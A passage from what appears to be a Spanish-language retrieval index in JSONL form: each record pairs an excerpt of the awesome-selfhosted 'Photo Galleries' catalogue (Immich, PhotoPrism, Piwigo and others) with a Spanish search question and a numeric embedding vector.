-0.00596, -0.03133, -0.03573, -0.06702, -0.07041, -0.0298, 0.02378, 0.01505, -0.07546, 0.01718, 0.03779, -0.02727, 0.03279, -0.00519, -0.00997, -0.01086, -0.02895, -0.02346, 0.01985, -0.01269, 0.02242, -0.0253, -0.00203, 0.03298, 0.05531, -0.08264, -0.0258, 0.05341, 0.07481, 0.00893, 0.01042, 0.0305, -0.03773, -0.00261, 0.01481, 0.01918, 0.02575, -0.02449, 0.03087, -0.04882, -0.02388, -0.04291, -0.00469, 0.05081, 0.03648, -0.00023, -0.05424, -0.00059, -0.02652, 0.04645, -0.0194, -0.12284, -0.03558, -0.01097, 0.1012, -0.03734, 0.07582, -0.05981]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Chevereto β€” Ultimate image sharing software. Create your very own personal image hosting website in just minutes [AGPL-3.0, PHP/Docker]. ChronoFrame β€” Personal gallery application with online photo management, supporting Live/Motion Photos, and explore map [MIT, Nodejs/Docker]. Damselfly β€” Fast server-based photo management system for large collections of images. Includes face detection, face & object recognition, powerful search, and EXIF Keyword tagging. Runs on Linux, MacOS and Windows [GPL-3.0, Docker/C#/.NET]. Ente β€” An end-to-end encrypted photo-sharing platform (alternative to Google Photos, Apple Photos) [AGPL-3.0, Docker/Nodejs/Go]. HomeGallery β€” Browse personal photos and videos featuring tagging, mobile-friendly, and AI powered image discovery [MIT, Nodejs/Docker]. Immich Kiosk β€” Lightweight slideshow for running on kiosk devices and browsers that uses Immich as a data source [GPL-3.0, Docker/Go]. Immich β€” Photo and video backup solution directly from your mobile phone (alternative to Google Photos) [AGPL-3.0, Docker].", "indexar": "que programa puedo usar para crear mi propio sitio de alojamiento de imΓ‘genes personal", "v": [-0.027, 0.17391, -0.18652, -0.18602, -0.00495, -0.1047, -0.02361, -0.08794, -0.11196, -0.16226, -0.03654, -0.08166, -0.00197, -0.09113, -0.05708, -0.07977, 0.11768, -0.10006, 0.10888, 0.03714, -0.04162, 0.06966, -0.03824, 0.0144, -0.04789, -0.0484, 0.13984, -0.05773, -0.07048, -0.00635, 0.05724, 0.09587, 0.04015, -0.01599, -0.02226, -0.13138, 0.09075, -0.05688, -0.04945, 0.00402, 0.071, -0.02279, -0.01225, 0.16924, 0.00516, 0.03011, 0.02427, -0.08328, -0.11754, -0.01087, 0.0386, -0.05104, -0.03714, 0.01944, 0.09583, -0.12306, 0.08498, -0.16257, 0.03033, 0.07152, -0.02415, 0.10741, 0.02176, 0.08687, 0.0132, 0.01932, 0.03715, 0.06169, -0.12599, -0.05555, -0.03565, -0.04181, 0.07093, -0.07773, 0.07282, 0.03544, -0.04156, -0.07293, -0.03655, -0.10455, -0.07723, -0.0234, -0.03394, 0.04305, -0.19524, -0.00938, 0.03015, -0.05776, 0.04758, -0.07349, 0.04914, 0.01064, 0.04962, 0.03952, 0.0053, -0.06995, 0.1194, 0.0647, 0.0606, 0.06429, 0.05777, -0.07931, 0.00027, 0.05972, 0.03656, 0.01695, 0.13277, -0.07988, -0.06516, -0.05263, 0.05027, -0.03508, -0.09219, -0.04974, -0.10856, -0.02303, -0.04064, -0.07916, 0.11071, -0.06404, -0.01843, -0.0363, -0.02373, -0.00048, 0.05652, 0.05409, -0.02414, 0.05098, -0.13065, 0.06951, -0.05395, 0.03233, -0.02674, -0.06237, -0.00861, 0.00052, -0.01168, -0.02941, 0.04382, -0.09186, -0.02004, 0.04979, -0.01672, -0.05522, 0.00921, 0.01148, -0.07879, -0.08003, -0.05621, 0.09372, 0.01039, 0.04121, 0.02789, -0.03251, -0.04998, 0.06613, 0.00989, -0.04351, -0.01731, 0.00791, -0.07919, 0.04573, 0.02759, 0.0407, 0.03283, -0.03954, -0.02595, -0.02468, -0.00321, 0.1238, -0.06918, 0.07048, -0.01482, -0.06888, 0.06124, 0.01645, -0.02149, -0.08652, -0.04963, -0.02308, -0.02089, 0.02848, -0.02778, -0.0149, 0.01499, 0.00116, 0.00698, 0.09709, -0.00919, -0.02535, -0.09706, 0.02047, -0.00067, 0.05606, 0.0144, -0.04402, -0.0467, 0.02316, 0.07265, -0.06369, -0.02757, 0.01419, -0.05355, 0.0285, 0.01433, -0.00071, -0.04542, 0.01827, 0.01533, 0.03226, 0.0232, -0.02639, 0.07118, -0.08538, -0.05791, -0.00469, 0.0565, -0.03981, 0.0066, 0.00149, 0.0114, 0.06764, 0.00403, 0.0473, 0.03831, -0.01576, 0.00874, -0.01036, 0.00503, 0.03304, -0.01857, 0.0416, -0.06355, -0.08817, 0.0471, 0.00803, 0.02138, -0.02057, -0.02833, -0.07875, 0.05163, 0.07346, -0.0395, -0.02022, 0.0089, -0.02907, -0.05038, 0.00791, -0.00022, -0.05386, 0.0077, 0.0005, 0.06459, -0.0478, 0.01497, 0.03676]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Chevereto β€” Ultimate image sharing software. Create your very own personal image hosting website in just minutes [AGPL-3.0, PHP/Docker]. ChronoFrame β€” Personal gallery application with online photo management, supporting Live/Motion Photos, and explore map [MIT, Nodejs/Docker]. Damselfly β€” Fast server-based photo management system for large collections of images. Includes face detection, face & object recognition, powerful search, and EXIF Keyword tagging. Runs on Linux, MacOS and Windows [GPL-3.0, Docker/C#/.NET]. Ente β€” An end-to-end encrypted photo-sharing platform (alternative to Google Photos, Apple Photos) [AGPL-3.0, Docker/Nodejs/Go]. HomeGallery β€” Browse personal photos and videos featuring tagging, mobile-friendly, and AI powered image discovery [MIT, Nodejs/Docker]. Immich Kiosk β€” Lightweight slideshow for running on kiosk devices and browsers that uses Immich as a data source [GPL-3.0, Docker/Go]. Immich β€” Photo and video backup solution directly from your mobile phone (alternative to Google Photos) [AGPL-3.0, Docker].", "indexar": "con quΓ© herramienta puedo gestionar y organizar mis fotos desde el mΓ³vil como alternativa a Google Fotos", "v": [-0.03265, 0.16665, -0.03336, -0.1921, -0.06998, -0.05369, -0.09203, 0.04609, -0.12268, -0.13931, -0.08419, -0.10247, 0.04413, 0.01768, 0.13838, -0.03723, 0.14721, -0.13026, -0.01233, 0.00462, -0.11173, 0.11725, -0.04576, -0.08913, -0.01806, -0.06044, 0.05164, -0.03703, -0.1269, -0.00895, 0.01181, -0.0578, -0.00592, -0.05128, -0.14719, -0.01794, 0.09852, -0.0005, -0.00997, -0.10365, -0.16797, -0.02549, -0.09241, 0.10711, -0.00814, -0.06113, -0.02884, -0.05564, -0.08642, 0.00814, -0.02459, -0.09976, -0.08819, 0.04591, 0.01642, -0.0797, 0.13152, -0.16113, -0.02011, -0.07949, -0.03896, 0.08535, -0.07691, 0.12318, 0.11523, 0.11854, 0.05735, 0.06609, -0.11775, 0.06452, 0.04195, 0.05226, 0.04271, -0.0182, 0.04702, 0.00086, 0.00594, 0.05667, -0.05861, 0.05353, 0.03499, -0.02041, -0.09759, 0.04812, -0.12231, -0.09197, 0.02989, -0.02583, -0.02196, -0.10223, -0.00339, -0.00601, 0.00279, -0.02454, -0.00864, 0.02933, 0.09707, -0.02317, 0.06572, 0.00075, 0.09362, -0.06918, -0.07924, 0.01189, -0.08771, -0.03826, 0.0607, -0.00177, -0.09309, -0.08646, -0.04474, -0.03511, 0.01259, 0.0624, -0.00562, 0.03839, 0.03222, -0.00911, -0.07344, -0.04554, 0.02085, -0.03815, -0.00408, -0.04965, 0.09662, 0.06316, -0.00703, 0.11248, -0.00088, -0.0264, -0.02202, -0.03262, -0.00268, -0.00358, -0.03708, 0.04421, -0.00569, -0.08289, 0.03263, -0.07379, -0.13426, 0.01596, -0.00421, -0.19299, 0.01561, 0.03013, -0.01214, -0.00409, -0.01578, 0.03357, 0.0275, -0.02101, 0.01041, 0.08505, -0.04269, 0.08032, -0.11603, -0.07689, -0.08242, 0.00117, -0.14066, -0.07914, 0.07103, 0.04934, -0.04369, -0.05296, 0.02198, -0.0326, -0.0377, 0.01113, -0.00284, 0.01777, 0.05195, -0.01829, 0.0443, -0.0205, 0.03396, -0.06953, 0.06095, 0.01339, 0.00721, 0.03671, -0.01928, 0.01335, 0.06608, -0.00919, -0.01729, 0.04466, -0.03696, -0.00907, -0.00307, 0.03762, 0.05282, -0.02833, 0.0811, -0.03836, -0.07757, -0.02946, 0.0562, 0.03358, -0.02628, -0.0698, 0.0386, 0.03311, -0.0035, -0.03378, -0.00303, 0.08796, 0.03212, -0.01257, -0.01885, 0.00812, 0.05289, -0.00924, -0.07078, -0.01103, -0.00353, 0.01137, -0.03034, -0.04533, 0.03707, 0.01774, 0.01307, 0.04396, -0.00227, 0.04747, -0.01825, -0.00177, -0.01521, -0.03111, 0.05147, 0.02759, -0.00862, 0.02568, 0.02461, -0.03483, 0.04424, -0.03509, -0.02211, -0.01637, 0.0104, 0.00184, -0.01621, 0.02051, -0.11469, -0.02593, -0.03353, 0.03373, -0.00587, -0.05575, 0.0193, 0.03363, 0.07799, -0.00897, -0.02301, -0.02032]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Chevereto β€” Ultimate image sharing software. Create your very own personal image hosting website in just minutes [AGPL-3.0, PHP/Docker]. ChronoFrame β€” Personal gallery application with online photo management, supporting Live/Motion Photos, and explore map [MIT, Nodejs/Docker]. Damselfly β€” Fast server-based photo management system for large collections of images. Includes face detection, face & object recognition, powerful search, and EXIF Keyword tagging. Runs on Linux, MacOS and Windows [GPL-3.0, Docker/C#/.NET]. Ente β€” An end-to-end encrypted photo-sharing platform (alternative to Google Photos, Apple Photos) [AGPL-3.0, Docker/Nodejs/Go]. HomeGallery β€” Browse personal photos and videos featuring tagging, mobile-friendly, and AI powered image discovery [MIT, Nodejs/Docker]. Immich Kiosk β€” Lightweight slideshow for running on kiosk devices and browsers that uses Immich as a data source [GPL-3.0, Docker/Go]. Immich β€” Photo and video backup solution directly from your mobile phone (alternative to Google Photos) [AGPL-3.0, Docker].", "indexar": "cual es una soluciΓ³n gratuita para hacer copias de seguridad de mis videos y fotos en casa", "v": [0.03964, 0.10454, -0.01006, -0.05732, -0.0875, -0.22209, -0.05745, 0.04533, -0.04718, -0.1068, -0.04693, -0.20508, 0.00414, 0.01903, 0.05134, -0.1351, 0.11814, 0.04276, 0.05366, 0.04466, 0.02471, -0.02864, -0.03802, -0.05439, -0.05867, 0.03536, 0.08047, 0.03472, -0.13709, 0.07792, 0.11985, -0.02515, 0.04591, 0.04139, -0.0951, 0.0171, 0.07853, -0.02376, -0.00578, 0.05267, 0.01464, -0.01826, -0.05291, 0.00549, 0.0011, -0.14014, 0.04432, -0.00884, -0.0545, -0.05698, -0.04629, -0.08464, -0.04262, -0.0602, -0.05962, -0.12684, 0.14233, -0.09548, 0.03687, 0.0441, -0.09482, 0.06759, 0.07347, 0.05246, 0.04863, -0.055, -0.06138, -0.01215, -0.0174, -0.04328, 0.02835, 0.11932, 0.05281, -0.00988, -0.08167, -0.10114, -0.13565, -0.09284, -0.08029, 0.13388, 0.01949, -0.04406, -0.06072, -0.01693, -0.0903, -0.07913, -0.05535, -0.02576, -0.03725, -0.075, -0.0019, 0.01718, 0.10272, 0.04983, -0.00552, -0.13509, 0.11933, 0.07228, -0.01292, 0.02312, 0.02655, -0.08467, -0.02776, 0.03466, -0.04955, -0.03594, 0.03298, 0.03703, -0.12678, -0.10245, -0.03855, 0.04833, -0.06028, 0.01292, -0.12508, -0.03016, -0.01579, -0.01662, 0.05902, 0.04514, -0.02403, -0.05457, -0.02516, -0.09349, 0.00365, -0.00883, 0.04127, 0.03131, -0.13666, 0.00392, -0.00884, -0.03023, -0.07901, -0.03052, 0.0545, -0.00902, -0.06399, -0.14093, -0.09814, -0.11216, 0.00475, 0.03394, 0.01158, -0.07891, -0.04102, 0.08158, -0.00029, -0.02284, -0.09268, 0.03361, -0.02706, 0.06343, -0.02189, -0.00423, 0.04547, 0.08129, -0.02593, -0.08162, -0.01028, 0.04292, 0.01338, 0.07427, 0.06064, -0.04841, -0.08533, -0.00622, -0.00091, 0.00346, -0.04669, -0.00059, -0.03282, 0.01143, -0.03708, -0.08271, 0.02313, -0.02543, 0.03215, -0.11193, -0.04794, -0.0633, -0.01407, 0.033, -0.00744, 0.04201, 0.07665, -0.03056, 0.04538, 0.12539, -0.01926, -0.01189, -0.01476, -0.08493, -0.07815, 0.0027, -0.00217, -0.0651, -0.04639, -0.06687, 0.0342, 0.05314, -0.0571, -0.06401, -0.00723, 0.00868, 0.04459, -0.0335, -0.0137, 0.03023, 0.0017, -0.0421, -0.06189, 0.06542, 0.06402, -0.02622, -0.04949, -0.00937, 0.00161, -0.00632, -0.01881, 0.02512, 0.08497, 0.07905, 0.01139, -0.02297, -0.00141, 0.04918, 0.04865, -0.00472, -0.02013, 0.00713, 0.0034, 0.05881, -0.01506, -0.03282, 0.10046, 0.01713, -0.01938, -0.03566, -0.01259, -0.06464, 0.0048, 0.08577, -0.01434, 0.04351, -0.08653, -0.04572, -0.05407, 0.06074, 0.0877, -0.08961, 0.01972, 0.03675, 0.04369, 0.00495, -0.01477, -0.04693]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: LibrePhotos β€” Photo management service with a slight focus on cool graphs (alternative to Google Photos) [MIT, Python/Docker]. Lychee β€” Grid and album based photo-management-system [MIT, PHP/Docker]. Mediagoblin β€” Media publishing platform that anyone can run (alternative to Flickr, YouTube, SoundCloud) [AGPL-3.0, Python]. Memtly β€” Event photo sharing platform and gallery with slideshow that allows guests to view and share memories via a QR code [GPL-3.0, C#/Docker]. Nextcloud Memories β€” Fast, modern and advanced photo management suite. Runs as a Nextcloud app [AGPL-3.0, PHP]. Photofield β€” Experimental fast photo viewer [MIT, Docker/Go]. PhotoPrism β€” Personal photo management powered by Go and Google TensorFlow. Browse, organize, and share your personal photo collection, using the latest technologies to automatically tag and find pictures [AGPL-3.0, Go/Docker].", "indexar": "ΒΏQuΓ© programa puedo usar para gestionar mis fotos de forma privada y automΓ‘tica?", "v": [-0.11863, 0.17431, -0.04068, -0.1729, 0.02129, -0.06183, -0.02362, -0.09234, -0.20288, -0.13272, -0.07012, -0.10032, 0.01945, -0.00233, -0.04343, -0.03826, 0.10121, -0.14267, 0.02125, 0.08595, -0.02185, -0.02988, -0.00855, -0.10776, -0.06604, -0.00031, 0.17689, -0.09945, -0.1766, -0.04088, 0.06776, 0.04453, 0.07891, -0.09677, 0.02044, 0.00281, 0.0763, -0.01808, 0.03551, 0.03722, 0.02849, -0.0209, -0.02783, 0.06815, 0.14735, 0.04645, 0.02689, -0.07179, -0.08617, -0.01096, -0.05961, -0.02322, -0.00753, 0.02668, 0.03701, -0.17026, 0.05439, -0.08805, -0.01583, 0.01604, -0.00265, 0.1026, -0.05489, 0.08038, 0.01277, -0.06061, 0.09216, -0.03146, -0.10826, 0.03087, 0.02123, 0.01152, 0.00256, 0.02856, 0.07074, 0.03143, -0.06521, 0.01988, 0.03188, -0.00752, -0.08457, -0.01204, -0.01427, 0.0336, -0.08791, -0.06408, 0.03711, -0.00636, -0.02181, -0.04906, 0.00319, -0.06439, 0.04627, -0.0366, 0.02905, -0.01265, 0.02195, 0.08251, -0.00117, 0.02237, 0.09356, -0.06399, -0.04949, 0.16126, -0.06549, 0.04046, 0.07368, -0.07015, -0.06325, -0.04643, -0.04091, 0.00484, -0.10913, -0.02618, -0.05807, 0.05346, -0.0088, -0.04971, 0.01052, -0.0188, -0.06672, -0.01924, 0.0317, -0.06245, 0.18382, -0.00445, -0.08524, 0.17345, -0.09388, 0.10164, -0.058, -0.00427, -0.03002, -0.09539, -0.02022, -0.02321, -0.05338, -0.01947, 0.00064, -0.1141, -0.07422, 0.05639, -0.03218, -0.0808, 0.04329, -0.04063, -0.01888, -0.10878, 0.03003, 0.07143, 0.05491, 0.02587, 0.05021, 0.07678, -0.07482, 0.03388, 0.02561, -0.06292, -0.04755, 0.05022, -0.08751, -0.01851, 0.00507, 0.01645, 0.02512, -0.01941, -0.00811, -0.06493, 0.00583, 0.06141, 0.0202, 0.04935, -0.00874, -0.03813, 0.02868, -0.01084, -0.0127, -0.11722, 0.05983, -0.02977, -0.02545, 0.06637, 0.03485, 0.04389, 0.03048, 0.02672, -0.00794, 0.05551, 0.00624, 0.0239, -0.01342, 0.03665, 0.03869, -0.04272, 0.05318, -0.04418, -0.07176, 0.04327, 0.02546, -0.03967, -0.02831, -0.01487, -0.00338, 0.01852, 0.04141, 0.04735, -0.02897, 0.06503, 0.08337, 0.04766, -0.0352, 0.03124, 0.12019, -0.02522, -0.063, 0.0235, 0.00696, 0.01503, -0.01597, -0.01276, -0.00733, 0.04514, 0.06924, 0.03889, 0.05346, -0.02856, 0.02912, 0.05912, -0.0079, 0.03154, -0.04053, 0.11211, -0.02956, -0.04474, 0.05444, -0.03718, 0.01281, -0.06216, -0.04281, -0.08535, 0.03606, 0.08415, 0.02239, 0.00111, -0.07705, -0.02076, -0.06164, 0.04766, 0.00683, -0.03304, 0.0023, 0.01341, 0.02153, -0.04544, 0.04772, 0.04344]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: LibrePhotos β€” Photo management service with a slight focus on cool graphs (alternative to Google Photos) [MIT, Python/Docker]. Lychee β€” Grid and album based photo-management-system [MIT, PHP/Docker]. Mediagoblin β€” Media publishing platform that anyone can run (alternative to Flickr, YouTube, SoundCloud) [AGPL-3.0, Python]. Memtly β€” Event photo sharing platform and gallery with slideshow that allows guests to view and share memories via a QR code [GPL-3.0, C#/Docker]. Nextcloud Memories β€” Fast, modern and advanced photo management suite. Runs as a Nextcloud app [AGPL-3.0, PHP]. Photofield β€” Experimental fast photo viewer [MIT, Docker/Go]. PhotoPrism β€” Personal photo management powered by Go and Google TensorFlow. Browse, organize, and share your personal photo collection, using the latest technologies to automatically tag and find pictures [AGPL-3.0, Go/Docker].", "indexar": "Necesito una alternativa libre a Google Photos que me permita organizar mi colecciΓ³n personal.", "v": [-0.01848, 0.19789, -0.14055, -0.12315, -0.14333, -0.08345, -0.04738, 0.05269, -0.23161, -0.15384, -0.04363, -0.09655, 0.04427, -0.00935, 0.10384, -0.10418, 0.09448, -0.0788, 0.13572, 0.06244, -0.1092, 0.09007, -0.06951, -0.10878, 0.04157, -0.10393, 0.12952, -0.04525, -0.05024, 0.04045, -0.05622, -0.02974, -0.03677, -0.06854, -0.08028, -0.03654, 0.08062, -0.05087, -0.04025, -0.18546, -0.0408, 0.04205, -0.13831, 0.22503, -0.01947, -0.0485, 0.01842, 0.03161, -0.11065, 0.06044, -0.01166, 0.0546, -0.08089, 0.08568, 0.06474, -0.021, 0.05725, -0.05902, -0.12144, 0.07629, -0.07978, 0.01717, 0.11783, 0.12945, 0.07698, 0.15366, 0.04444, 0.08902, -0.09749, 0.04904, -0.09727, -0.05053, 0.00849, -0.01254, -0.00409, 0.01147, 0.01971, -0.02609, -0.07924, 0.09087, 0.05555, -0.03437, -0.0227, 0.05934, -0.02818, -0.08506, 0.07224, -0.03571, 0.11857, 0.00756, 0.005, -0.05666, -0.06898, 0.00526, 0.0214, -0.02826, 0.06993, 0.07941, 0.05788, 0.04504, 0.08167, -0.01959, -0.02605, -0.05928, -0.07554, -0.0099, 0.03874, 0.06942, -0.07507, -0.02097, -0.05377, -0.02171, 0.00345, 0.03307, 0.0312, -0.06053, 0.00023, 0.04982, -0.0091, 0.03427, -0.00707, -0.09032, -0.03079, -0.04013, 0.01169, 0.0565, -0.00454, 0.038, -0.03072, -0.02281, 0.00581, -0.01483, -0.01514, -0.0572, -0.02169, 0.07567, -0.00162, -0.07045, 0.07311, -0.04085, -0.07969, -0.05411, 0.00557, -0.09248, -0.00023, -0.03007, -0.03174, 0.008, -0.02861, -0.04259, -0.04439, -0.01467, 0.06354, 0.07768, 0.02432, 0.06683, -0.08826, -0.0825, 0.00145, -0.06884, -0.05082, -0.01152, 0.065, 0.04353, -0.02486, -0.0163, 0.09585, -0.00322, -0.11789, 0.02186, 0.0125, 0.00151, -0.00205, -0.07692, 0.05626, 0.01529, 0.0532, -0.06553, 0.05492, 0.0419, 0.02834, 0.04576, -0.03177, -0.00724, 0.01319, -0.06212, -0.00267, 0.02312, 0.02845, -0.0173, -0.07708, 0.02657, 0.03257, -0.01803, 0.03812, 0.02199, -0.0435, -0.06007, 0.02834, 0.04918, -0.03583, -0.05535, -0.03358, 0.02513, -0.02497, -0.04298, 0.00347, 0.04098, 0.03058, -0.02842, 0.03847, 0.00076, 0.05969, -0.02796, -0.04415, 0.01952, 0.04015, 0.01024, 0.02317, -0.06373, 0.04204, 0.04089, -0.00549, 0.01509, 0.02478, 0.02417, -0.00397, -0.02151, -0.00403, -0.02293, 0.06172, 0.01815, -0.04022, 0.00737, 0.00631, -0.04511, -0.03522, 0.00734, 0.02005, 0.00735, 0.07455, 0.03096, -0.04012, 0.02764, -0.03238, -0.04225, -0.02987, 0.00291, -0.04849, -0.04594, 0.00888, 0.03661, 0.0293, -0.04266, 0.00355, -0.00406]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: LibrePhotos β€” Photo management service with a slight focus on cool graphs (alternative to Google Photos) [MIT, Python/Docker]. Lychee β€” Grid and album based photo-management-system [MIT, PHP/Docker]. Mediagoblin β€” Media publishing platform that anyone can run (alternative to Flickr, YouTube, SoundCloud) [AGPL-3.0, Python]. Memtly β€” Event photo sharing platform and gallery with slideshow that allows guests to view and share memories via a QR code [GPL-3.0, C#/Docker]. Nextcloud Memories β€” Fast, modern and advanced photo management suite. Runs as a Nextcloud app [AGPL-3.0, PHP]. Photofield β€” Experimental fast photo viewer [MIT, Docker/Go]. PhotoPrism β€” Personal photo management powered by Go and Google TensorFlow. Browse, organize, and share your personal photo collection, using the latest technologies to automatically tag and find pictures [AGPL-3.0, Go/Docker].", "indexar": "ΒΏCon quΓ© herramienta puedo subir eventos de fotos y compartir recuerdos mediante cΓ³digo QR?", "v": [-0.01714, 0.12692, -0.14313, -0.15411, -0.06865, -0.23836, 0.00959, 0.07155, -0.05013, -0.29142, -0.17913, -0.0547, -0.01713, -0.08139, 0.06704, -0.00224, 0.18131, 0.04005, 0.07711, -0.00339, 0.03233, 0.03174, -0.09783, -0.08229, -0.05622, -0.09134, 0.04371, 0.06731, -0.08013, -0.05275, 0.09642, 0.01657, 0.11012, 0.0606, -0.11313, 0.00139, 0.15239, 0.14995, -0.04076, -0.06359, -0.04219, 0.03717, -0.00558, 0.05046, 0.04207, -0.08182, -0.09694, 0.03784, -0.00397, -0.0483, 0.017, -0.03177, -0.09995, -0.04022, -0.05741, -0.0861, 0.11133, -0.06216, -0.00722, -0.00525, 0.08263, -0.00294, -0.06418, -0.01746, -0.01226, -0.06509, 0.02379, 0.0403, -0.09799, 0.08146, -0.11465, 0.05998, 0.03964, -0.05579, 0.08016, 0.01653, 0.0117, -0.07437, -0.03951, 0.07222, -0.07057, 0.00627, -0.02963, 0.03365, -0.02895, -0.00613, 0.00879, -0.069, 0.02252, -0.12609, 0.06997, -0.00538, 0.06879, -0.01834, -0.00871, -0.02457, 0.05517, 0.06365, 0.05843, 0.03514, 0.0948, -0.08025, 0.01949, 0.02374, 0.08147, 0.0337, 0.03393, -0.0554, 0.04695, -0.00354, 0.04277, -0.02486, -0.07006, -0.01593, -0.08205, 0.09365, -0.00509, -0.12836, -0.00545, -0.03555, 0.05389, 0.01519, 0.02523, -0.02249, 0.00197, 0.08036, -0.03563, 0.17265, -0.09685, -0.04405, -0.06525, 0.06424, 0.00228, -0.00718, 0.06754, 0.00266, 0.07838, -0.0027, 0.04011, -0.06878, -0.0278, -0.03872, -0.05681, -0.04154, -0.02242, 0.09998, -0.00628, -0.00013, -0.05451, 0.06089, 0.0016, 0.03448, -0.02829, 0.02477, -0.03177, -0.01927, -0.02946, -0.09707, -0.06706, -0.00262, -0.16692, 0.03251, 0.08351, 0.01243, -0.02285, -0.03684, -0.0122, -0.05104, 0.04625, 0.03269, -0.02261, -0.02166, 0.05402, -0.06527, 0.05025, -0.05937, -0.04007, -0.05607, -0.02564, -0.05729, -0.06232, 0.03448, 0.07156, 0.00294, 0.0641, -0.06971, 0.05698, 0.03642, 0.01303, -0.02437, -0.00995, -0.00844, 0.03241, -0.06048, 0.04463, -0.00769, -0.01634, -0.01219, 0.01863, -0.0078, -0.01223, 0.02043, 0.04343, -0.02975, 0.05233, 0.00171, -0.03003, 0.06641, -0.00265, -0.00766, -0.01239, -0.01891, 0.07973, -0.0516, -0.02993, 0.03634, 0.00345, 0.06143, -0.00517, -0.05286, 0.02589, 0.01997, 0.04375, 0.01527, 0.03218, 0.00561, 0.01493, 0.04254, 0.00626, -0.02973, -0.00539, 0.05373, 0.01479, 0.00825, 0.07289, 0.0012, -0.01707, -0.00174, -0.0737, -0.02857, -0.01023, 0.00961, -0.02594, -0.04396, -0.07882, -0.00745, -0.0484, -0.01271, -0.02257, -0.07519, 0.00665, -0.03834, 0.04717, -0.04006, -0.02667, -0.03592]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Photoview β€” Simple and user-friendly photo gallery for personal servers. It is made for photographers and aims to provide an easy and fast way to navigate directories, with thousands of high resolution photos [GPL-3.0, Go/Docker]. PiGallery 2 β€” Directory-first photo gallery website, with a rich UI, optimised for running on low resource servers [MIT, Docker/Nodejs]. Piwigo β€” Photo gallery software for the web, built by an active community of users and developers [GPL-2.0, PHP]. sigal β€” Yet another simple static gallery generator [MIT, Python]. SPIS β€” A simple, lightweight and fast media server with decent mobile support [GPL-3.0, Docker/Rust]. This week in past β€” Aggregates images taken this week, from previous years and presents them on a web page with a simple slideshow [MIT, Docker/Rust]. Thumbor β€” A smart imaging service and enables on-demand cropping, resizing, applying filters and optimizing images [MIT, Python/Docker]. Zenphoto β€” Open-source gallery and CMS project [GPL-2.0, PHP].", "indexar": "que programa hay para montar un catΓ‘logo de fotos en servidores personales", "v": [0.00549, 0.00074, -0.12394, -0.28184, -0.16791, -0.20634, 0.12088, -0.04152, -0.12989, -0.13239, -0.01751, -0.03126, 0.06688, -0.09643, 0.04549, 0.03217, 0.14751, -0.1425, 0.13594, 0.09734, -0.02921, 0.10023, -0.01714, -0.06238, -0.04388, 0.08353, 0.05831, -0.10069, -0.07037, 0.0882, 0.08904, -0.04, 0.0417, -0.02136, 0.0145, -0.07894, 0.07667, -0.02776, -0.06779, 0.00161, 0.04433, -0.04328, -0.00243, 0.05342, -0.01829, 0.0156, 0.03701, -0.05997, -0.00355, -0.04326, 0.0601, -0.03346, 0.06441, 0.03569, 0.00947, -0.15965, -0.04458, 0.02281, -0.00076, 0.03712, 0.00928, 0.19219, -0.03126, 0.05712, -0.01108, -0.00365, 0.02624, -0.01853, -0.13303, -0.04911, -0.01679, -0.06397, 0.03899, -0.06689, -0.09306, 0.02788, -0.01421, -0.05938, 0.06032, 0.06064, -0.04198, 0.01916, 0.0203, 0.14626, -0.15104, 0.00519, 0.00986, 0.0237, 0.036, -0.02837, 0.07527, 0.04719, -0.02293, 0.04735, 0.05998, -0.03218, 0.2093, 0.05799, 0.07617, 0.01152, -0.04153, 0.01325, -0.00634, 0.08928, -0.08654, 0.05014, 0.1178, -0.03788, -0.02809, -0.03209, 0.01103, -0.0332, -0.08494, 0.06764, -0.07374, -0.11121, 0.01837, -0.01099, 0.03142, 0.04489, -0.06185, 0.06451, 0.0717, 0.00459, 0.13908, -0.02177, 0.0349, 0.01185, -0.09011, 0.03603, 0.00585, 0.02439, -0.05406, -0.03068, -0.0822, -0.03753, 0.01543, -0.00869, 0.00751, -0.0408, -0.04851, -0.01992, -0.02156, -0.0312, -0.00221, -0.00246, 0.02882, -0.06253, -0.0021, 0.06752, 0.02521, 0.09455, 0.02184, 0.02521, -0.05155, -0.02588, 0.00142, -0.03067, -0.04196, 0.00261, 0.00207, 0.06131, 0.02734, 0.09421, 0.02694, -0.00561, -0.01592, 0.03219, 0.05307, 0.04145, -0.03492, 0.00665, 0.02293, -0.062, 0.02744, 0.05715, -0.04021, -0.04538, 0.09186, 0.06708, -0.06708, 0.03244, 0.07481, 0.03274, -0.0286, -0.01866, -0.04657, 0.06493, -0.00634, -0.05136, -0.02687, -0.04528, -0.03918, 0.07263, 0.10129, 0.00377, -0.05117, 0.12999, 0.01723, -0.03212, 0.04471, -0.02483, -0.04617, 